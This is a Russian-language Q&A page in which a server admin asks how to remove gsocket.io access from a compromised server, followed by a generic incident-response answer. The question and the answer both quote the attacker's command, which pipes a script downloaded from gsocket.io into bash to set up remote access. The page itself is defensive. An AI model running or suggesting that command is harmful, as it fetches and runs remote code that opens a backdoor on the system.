Посещая наш сайт, вы соглашаетесь с нашей политикой конфиденциальности в отношении файлов cookie, статистики отслеживания и т. д.

Главная » Вопросы и ответы » Информационная безопасность

Удаление соединения Gsocket.io с сервером

На чтение 4 мин Опубликовано
Содержание
  1. Вопрос или проблема
  2. Ответ или решение
  3. Удаление доступа gsocket.io с сервера
  4. 1. Оценка повреждения системы
  5. 2. Удаление вредоносного ПО
  6. 3. Устранение уязвимости
  7. 4. Окончательная проверка
  8. Заключение

Вопрос или проблема

Сервер моего клиента был скомпрометирован. Они запускают этот скрипт с помощью PHP-скрипта

bash -c "$(curl -fsSL https://gsocket.io/x)"

и у меня есть несколько папок в /tmp, как ниже

-rw-------  1 *** *** 153310 30 Сен 12:07 phpb0wrlJ
-rw-------  1 *** *** 65536 29 Сен 13:50 phpc29KRO
-rw-------  1 *** *** 40960 30 Сен 12:43 phpdrvPac
-rw-------  1 *** *** 49152 29 Сен 14:30 phpOWdcZw

Это действительно подозрительно.
Я:

  1. Проверил наличие новых пользователей или несанкционированных изменений в файлах /etc/passwd и /etc/shadow.
  2. Проанализировал сетевые подключения с помощью команд netstat -tulnp или ss -tuln, ища незнакомые прослушивающие сервисы или соединения.
  3. Изучил запущенные процессы с помощью ps aux, чтобы определить подозрительные скрипты или бинарники.
  4. Просмотрел журналы в /var/log, особенно auth.log, syslog или messages, на предмет несанкционированных входов, использования sudo или другой необычной активности.
  5. Нашел незнакомые файлы в критических директориях, таких как /tmp, /var/tmp, /home, /etc, или любых бинарных директориях, таких как /usr/local/bin.

Мой вопрос: как удалить доступ gsocket с моего сервера?

Заранее спасибо.

Ответ или решение

Удаление доступа gsocket.io с сервера

Когда ваш сервер был скомпрометирован и обнаружены подозрительные скрипты, такие как команда, исполняемая из PHP-скрипта:

bash -c "$(curl -fsSL https://gsocket.io/x)"

это может свидетельствовать о наличии вредоносного ПО или удаленного доступа к вашему серверу. Ваша задача — эффективно удалить доступ gsocket.io и восстановить безопасность системы.

1. Оценка повреждения системы

Первый шаг к устранению угрозы — это полное понимание ситуации. Прежде всего, проведите анализ текущего состояния сервера:

  • Проверка файлов: Содержимое каталога /tmp с файлами, такими как phpb0wrlJ, phpc29KRO, phpdrvPac, и phpOWdcZw, указывает на возможное присутствие вредоносных скриптов. Все файлы в этом каталоге нужно удалить:

    rm -rf /tmp/php*

  • Просмотр сетевых подключений: Выполните команду для проверки активных соединений и прослушивающих сервисов:

    netstat -tulnp

    Если вы обнаружите какие-либо подозрительные подключения, вам нужно будет выяснить, какие процессы их используют и при необходимости завершить их:

    kill -9 [PID]

2. Удаление вредоносного ПО

Чтобы окончательно удалить доступ gsocket.io:

  • Отключите вредоносные процессы: Используйте ps aux для поиска подозрительных процессов, связанных с gsocket.io. Убедитесь, что все процессы, такие как gsocket, завершены.

  • Очистка настроек конфигурации: Проверьте файлы конфигурации, такие как .bashrc, .bash_profile, и подобные, чтобы убедиться, что в них нет ссылок или команд, которые могут восстанавливать доступ к gsocket.io.

  • Смена паролей: Измените все пароли к учетным записям пользователей, особенно к тем, которые имеют права root или sudo. Это необходимо для предотвращения повторного доступа злоумышленников.

3. Устранение уязвимости

После удаления доступа необходимо убедиться, что сервер защищен от повторных атак:

  • Обновление ПО: Убедитесь, что операционная система и все установленные пакеты обновлены до последних версий. Обновления часто содержат исправления известных уязвимостей.

  • Настройка брандмауэра: Используйте iptables или ufw для настройки брандмауэра и ограничения входящих подключений только к необходимым портам.

  • Мониторинг системы: Установите средства мониторинга и алертинга для отслеживания необычных действий. Это может быть как использование простых скриптов, так и специализированные инструменты, такие как OSSEC или Fail2ban.

4. Окончательная проверка

После выполнения всех вышеуказанных шагов выполните полное сканирование системы:

  • Антивирусная проверка: Запустите антивирусные утилиты, чтобы убедиться, что нет оставшегося вредоносного ПО на сервере.

  • Аудит безопасности: Проведите аудит безопасности всей системы, проверив конфигурацию служб и удалив неиспользуемые.

Заключение

Убедитесь, что ваша команда ознакомлена с безопасными практиками и не выполняет потенциально небезопасные команды на сервере без должного анализа. Помните, контроль за безопасностью должен быть постоянным процессом, включающим обновления, мониторинг и готовность к реагированию на инциденты. Если у вас нет уверенности в возможностях восстановления безопасности самостоятельно, рекомендуется привлечь специалистов в области кибербезопасности.

cpanel php
Оцените материал
Добавить комментарий

Капча загружается...

© 2024 IZ6.RU
*В материалах сайта упоминаются социальные сети Фейсбук / Инстаграм, принадлежащие Meta Platforms Inc., деятельность которой запрещена на территории РФ в части реализации данных социальных сетей на основании осуществления ею экстремистской деятельности